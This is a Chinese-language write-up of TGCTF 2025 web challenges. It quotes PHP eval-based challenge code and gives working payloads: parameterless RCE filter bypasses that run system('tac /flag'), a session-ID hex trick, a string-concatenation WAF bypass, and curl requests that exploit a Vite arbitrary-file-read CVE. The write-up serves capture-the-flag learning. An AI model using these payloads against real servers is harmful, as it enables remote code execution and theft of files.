TGCTF

AAA偷渡阴平:

<?php
$tgctf2025=$_GET['tgctf2025'];
if(!preg_match("/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $tgctf2025)){
    //hint：你可以对着键盘一个一个看，然后在没过滤的符号上用记号笔画一下（bushi
    eval($tgctf2025);
}
else{
    die('(╯‵□′)╯炸弹！•••*～●');
}

highlight_file(__FILE__);

打开一看发现过滤了一些特殊符号和1和3到9(感觉有点刻意了没有2(😀))这个是eval，正常是使用system的，不过’’””``都过滤了，正好sun师傅之前让我看看无参数rce，有用场了

var_dump(getallheaders());先试试water,可以 不过我还是喜欢使用get_defined_vars()这个，因为第一个是使用heard头，感觉有点麻烦了
var_dump(get_defined_vars());&b=111 发现：
array(5) { ["_GET"]=> array(2) { ["tgctf2025"]=> string(29) "var_dump(get_defined_vars());" ["b"]=> string(3) "111" } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(1) { ["PHPSESSID"]=> string(32) "26d0ac1ba2391440de04672e76f50b31" } ["_FILES"]=> array(0) { } ["tgctf2025"]=> string(29) "var_dump(get_defined_vars());" } 
ok了，可以进行rce了
?tgctf2025=eval(end(current(get_defined_vars())));&b=system('ls /');
?tgctf2025=eval(end(current(get_defined_vars())));&b=system('tac /flag');
(不过有2的话还可以session_start();system(hex2bin(session_id())); cookie:PHPSESSID=636174202f662a)

AAA偷渡阴平（复仇）:

<?php
$tgctf2025=$_GET['tgctf2025'];
if(!preg_match("/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\|localeconv|pos|current|print|var|dump|getallheaders|get|defined|str|split|spl|autoload|extensions|eval|phpversion|floor|sqrt|tan|cosh|sinh|ceil|chr|dir|getcwd|getallheaders|end|next|prev|reset|each|pos|current|array|reverse|pop|rand|flip|flip|rand|content|echo|readfile|highlight|show|source|file|assert/i", $tgctf2025)){
    //hint：你可以对着键盘一个一个看，然后在没过滤的符号上用记号笔画一下（bushi
    eval($tgctf2025);
}
else{
    die('(╯‵□′)╯炸弹！•••*～●');
}
highlight_file(__FILE__);

?tgctf2025session_start();system(hex2bin(session_id())); cookie:PHPSESSID=636174202f662a
这个过滤了一些函数之前的肯定使用不了了(毕竟是复仇吗哈哈哈哈)

前端GAME：

打开是一个消消乐，玩了玩(不过首先肯定是要看一下前端js的)发现只要分数高于17分就显示/tgflagggg,不过肯定是直接访问不了的，

发现了这里的vite想起这里是有一个任意文件读取的漏洞的，在网上看了看，发现CVE-2025-30208，就ok了

curl "url+?import&raw"(url是你自己访问不了的地址)(不知道为什么在抖音上面看到了，大数据是懂我的)

火眼辩魑魅：

shell学姐会让青春CTF少年脸红吗？只有一个洞是通的，看不出来的话就尝试每个漏洞都试一遍哦，杂鱼~

额，什么都没有。dirsearch来扫一下，发现

User-Agent: *
Disallow: tgupload.php
Disallow: tgshell.php
Disallow: tgxff.php
Disallow: tgser.php
Disallow: tgphp.php
Disallow: tginclude.php

因为是shell学姐吗，直接看tgshell.php(其实是手里面有sun师傅独特的rce骚操作(感觉rce的骚姿势都好变态))（其他的后面再补充）

<?php
    $shell=$_POST["shell"];
    {
        eval($shell);
   }
?>

随便试了试发现有waf，不慌，直接拿sun师傅rce骚操作一个个试(其实可以直接蚁剑直接连接的)

shell=$a='syst'.'em';$a('ls /'); ok了；爽了

前端GAME Plus：

(不如pro max)

这个就又是cve的了

curl "http://127.0.0.1:52091/tgflagggg?.svg?.wasm?init"